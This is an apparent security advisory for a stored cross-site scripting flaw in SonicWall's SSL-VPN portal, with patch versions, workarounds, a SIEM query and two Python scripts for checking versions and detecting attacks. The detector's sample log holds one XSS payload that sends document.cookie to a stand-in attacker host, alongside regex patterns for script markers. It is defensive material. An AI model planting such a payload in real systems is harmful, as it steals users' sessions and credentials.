CVE-2024-22397
📋 TL;DR
This stored cross-site scripting (XSS) vulnerability in the SonicOS SSL-VPN portal allows a remote attacker who is authenticated as a firewall admin user to store arbitrary JavaScript in the portal; the script then executes in the browser of any user or administrator who later loads the affected portal page. An attacker holding admin credentials can use it to hijack other users' sessions, steal credentials, or perform actions on their behalf. Only SonicWall firewalls with SSL-VPN enabled and running affected SonicOS versions are impacted.
💻 Affected Systems
- SonicWall firewalls with SSLVPN portal
⚠️ Manual Verification Required
This CVE has no machine-readable version ranges in our database (the NVD entry does not carry them), so automated detection cannot decide whether your system is affected. Use the versions given in the Fix and How to Verify sections below, and confirm them against the vendor advisory before relying on them.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
An attacker who already holds admin credentials plants a persistent payload that runs in every other administrator's and portal user's browser: session hijacking, credential harvesting, actions performed with the victims' privileges, and, because the firewall sits at the network edge, a foothold from which to pivot into internal systems and stage further payloads such as ransomware.
Likely Case
Because admin credentials are a prerequisite, this is a post-compromise technique rather than an initial-access one: an attacker with stolen or reused admin credentials injects a script that steals session cookies and credentials of other portal users, giving them durable access and a path to lateral movement and data exfiltration even after the original credentials are rotated.
If Mitigated
With proper access controls and monitoring, impact limited to isolated credential theft that can be detected and contained.
🎯 Exploit Status
Exploitation requires valid firewall admin credentials. Once authenticated, storing the payload is a straightforward stored-XSS injection through admin-configurable portal content, and the payload fires whenever a victim loads the affected page; no further interaction with the attacker is needed.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: SonicOS 7.1.1-7041 and later, SonicOS 7.0.1-5111 and later
Vendor Advisory: https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0005
Restart Required: Yes
Instructions:
1. Log into the SonicWall firewall management interface.
2. Navigate to System > Settings > Firmware & Backups.
3. Download and install the patched firmware version.
4. Reboot the firewall after the installation completes.
🔧 Temporary Workarounds
Disable SSLVPN portal
Temporarily disable the SSL-VPN portal if it is not required for business operations; with the portal off, the stored payload has no page to execute from.
Navigate to VPN > SSL-VPN > Server Settings and uncheck 'Enable SSL-VPN' (menu paths differ between SonicOS 6.5 and 7; use the equivalent page on your version).
Restrict admin access
Since the attacker must authenticate as an admin, reduce who can reach the management interface: allow management only from trusted source addresses or over VPN, use unique per-person admin accounts, and require multi-factor authentication for all of them.
Navigate to System > Administration > Administrators and enable MFA for all admin accounts.
🧯 If You Can't Patch
- Input validation and output encoding inside the portal are the vendor's fix and cannot be applied by the firewall operator; the controls available to you are limiting who can log in as admin (trusted management addresses, MFA, credential rotation) and limiting who loads the portal (disable it, or restrict it to the zones and users that need it)
- If the portal is published through a reverse proxy, deploy web application firewall (WAF) rules that block XSS payloads in requests to it; this only stops the injection step and does nothing about a payload that is already stored, so review admin-editable portal content as well
🔍 How to Verify
Check if Vulnerable:
Check SonicOS version in System > Status > System Information. If version is 7.1.1-7040 or earlier, or 7.0.1-5110 or earlier, system is vulnerable.
Check Version:
show version (from CLI) or check System > Status > System Information (from GUI)
Verify Fix Applied:
Verify the SonicOS version is 7.1.1-7041 or later, or 7.0.1-5111 or later. If you test the SSL-VPN portal for XSS yourself, do it on a lab unit or in a change window: a stored payload is served to every real user of the portal, so use a harmless marker payload (for example one that only writes to the page) and remove it afterwards.
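The version comparison above, as an added example that is not from this page's database or from SonicWall: a small Python checker that parses a SonicOS version string (or the text of `show version`) and compares it with the fixed builds listed in the Fix section. The thresholds are the ones this page states and must be confirmed against SNWLID-2024-0005; the handling of the optional `-Rnnnn` release suffix and the sample `show version` text are assumptions, and the CLI text is constructed.

```python
"""Check a SonicOS version string against the fixed builds listed on this page."""
import re
from typing import Optional, Tuple

# Fixed builds as stated in the Fix section; cross-check against the vendor
# advisory (SNWLID-2024-0005) before relying on them. Keyed by (major, minor).
FIXED_BUILDS = {
    (7, 1): (7, 1, 1, 7041),
    (7, 0): (7, 0, 1, 5111),
}

# major.minor.patch-build, with the optional "-Rnnnn" release suffix that Gen7
# firmware names carry (assumed not to affect ordering within a build).
VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)-(\d+)(?:-R\d+)?")

# Constructed sample of CLI/GUI output; real output has more lines.
SAMPLE_SHOW_VERSION = """\
Firmware Version: SonicOS 7.1.1-7040
"""


def parse_version(text: str) -> Tuple[int, int, int, int]:
    """Split '7.1.1-7040[-R1234]' into a comparable (major, minor, patch, build) tuple."""
    m = VERSION_RE.fullmatch(text.strip())
    if m is None:
        raise ValueError(f"unrecognised SonicOS version: {text!r}")
    major, minor, patch, build = (int(x) for x in m.groups())
    return (major, minor, patch, build)


def extract_version(blob: str) -> Optional[str]:
    """Pull the first version-looking token out of 'show version' or GUI text."""
    m = VERSION_RE.search(blob)
    return m.group(0) if m else None


def is_vulnerable(text: Optional[str]) -> Optional[bool]:
    """True/False for the 7.0.x and 7.1.x branches covered here; None when unknown.

    None means 'check the advisory by hand': the string did not parse, or the
    branch (for example Gen6 6.5.x) is not one this page gives thresholds for.
    """
    if text is None:
        return None
    try:
        v = parse_version(text)
    except ValueError:
        return None
    fixed = FIXED_BUILDS.get(v[:2])
    if fixed is None:
        return None
    return v < fixed  # tuple comparison: patch level first, then build number


if __name__ == "__main__":
    found = extract_version(SAMPLE_SHOW_VERSION)
    print(f"version {found}: vulnerable={is_vulnerable(found)}")
    for v in ("7.1.1-7041", "7.0.1-5050-R1995", "7.1.2-7019", "6.5.4.4-44v-21-1452"):
        print(f"version {v}: vulnerable={is_vulnerable(v)}")
```

The tuple comparison is what makes the check honest for mixed inputs: 7.1.2-7019 compares greater than 7.1.1-7041 even though its build number is lower, and anything outside the two branches comes back as None rather than a false "fixed".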
📡 Detection & Monitoring
Log Indicators:
- Unusual admin login patterns
- Multiple failed login attempts followed by successful admin login
- Suspicious JavaScript payloads in SSLVPN portal logs
Network Indicators:
- Unusual outbound connections from firewall after admin login
- Traffic patterns suggesting credential harvesting
SIEM Query:
source="sonicwall" AND (event_type="admin_login" OR event_type="ssl_vpn") AND (message="*script*" OR message="*javascript*" OR message="*onerror*" OR message="*onload*")
The query is Splunk-style; field names depend on how your collector parses SonicWall syslog. Note that "*script*" also matches words such as "description" and "subscription", so expect to tune the wildcards against your own logs.
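The two log indicators above (failed admin logins followed by a success, and script-like content in portal-related events), as an added example that is not part of this page or of any SonicWall tooling: a Python detector run over constructed SonicWall-style key=value syslog lines. The message texts in the sample are illustrative and not taken from the SonicOS message catalogue; the field names (`msg`, `src`, `usr`, `note`) and the 10-minute window are assumptions.

```python
"""Scan SonicWall-style syslog (key=value) lines for the indicators listed above."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Deque, Dict, Iterable, List, Tuple

# key=value pairs; values are either "quoted strings" or a single bare token.
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# Same markers as the SIEM query (script / javascript / onerror / onload),
# anchored to tag or attribute syntax to avoid matching "description".
XSS_MARKERS = re.compile(r"<script|javascript:|on(?:error|load)\s*=|<img\b|<svg\b", re.I)

# Address/identifier fields are never free text, so they are not pattern-matched.
SKIP_FIELDS = {"id", "sn", "time", "fw", "src", "dst", "pri"}

# Constructed sample lines (message texts are illustrative, not real SonicOS IDs).
SAMPLE_LOGS = """\
id=firewall sn=0000000000 time="2024-02-20 09:58:01" fw=203.0.113.10 pri=1 msg="Administrator login denied due to bad credentials" src=198.51.100.7 dst=203.0.113.10 usr=admin
id=firewall sn=0000000000 time="2024-02-20 09:58:09" fw=203.0.113.10 pri=1 msg="Administrator login denied due to bad credentials" src=198.51.100.7 dst=203.0.113.10 usr=admin
id=firewall sn=0000000000 time="2024-02-20 09:58:40" fw=203.0.113.10 pri=6 msg="Administrator login allowed" src=198.51.100.7 dst=203.0.113.10 usr=admin
id=firewall sn=0000000000 time="2024-02-20 10:02:15" fw=203.0.113.10 pri=6 msg="SSL VPN portal settings modified" src=198.51.100.7 dst=203.0.113.10 usr=admin note="<img src=x onerror=fetch('//attacker.example/?c='+document.cookie)>"
id=firewall sn=0000000000 time="2024-02-20 10:30:00" fw=203.0.113.10 pri=6 msg="Administrator login allowed" src=192.0.2.5 dst=203.0.113.10 usr=admin
"""

Alert = Tuple[str, str, str]  # (rule, source ip, event time)


def parse_line(line: str) -> Dict[str, str]:
    """Return the key=value fields of one line (a later duplicate key overwrites)."""
    return {k: (quoted if quoted else bare) for k, quoted, bare in KV_RE.findall(line)}


def detect(lines: Iterable[str], fail_threshold: int = 2,
           window: timedelta = timedelta(minutes=10)) -> List[Alert]:
    """Apply the two rules from the Log Indicators list and return the alerts raised."""
    alerts: List[Alert] = []
    failures: Dict[str, Deque[datetime]] = defaultdict(deque)  # src ip -> failed-login times
    for line in lines:
        ev = parse_line(line)
        if "time" not in ev:
            continue
        ts = datetime.strptime(ev["time"], "%Y-%m-%d %H:%M:%S")
        src = ev.get("src", "unknown")
        msg = ev.get("msg", "").lower()

        # Rule 1: fail_threshold or more failed admin logins from one source,
        # followed by a successful admin login from the same source inside the window.
        recent = failures[src]
        while recent and ts - recent[0] > window:
            recent.popleft()
        if "login denied" in msg:
            recent.append(ts)
        elif "login allowed" in msg:
            if len(recent) >= fail_threshold:
                alerts.append(("failed_then_success", src, ev["time"]))
            recent.clear()

        # Rule 2: script-like content in any free-text field of the event.
        for key, value in ev.items():
            if key not in SKIP_FIELDS and XSS_MARKERS.search(value):
                alerts.append(("xss_payload", src, ev["time"]))
                break
    return alerts


if __name__ == "__main__":
    for rule, src, when in detect(SAMPLE_LOGS.splitlines()):
        print(f"{when} {src} {rule}")
```

Rule 2 is the part worth keeping in production: it inspects the stored values themselves rather than a raw substring of the whole line, which is why the `description`-style false positives of the bare SIEM wildcard do not occur here. Rule 1 is stateful per source address, so it needs a window sized to your admin session behaviour.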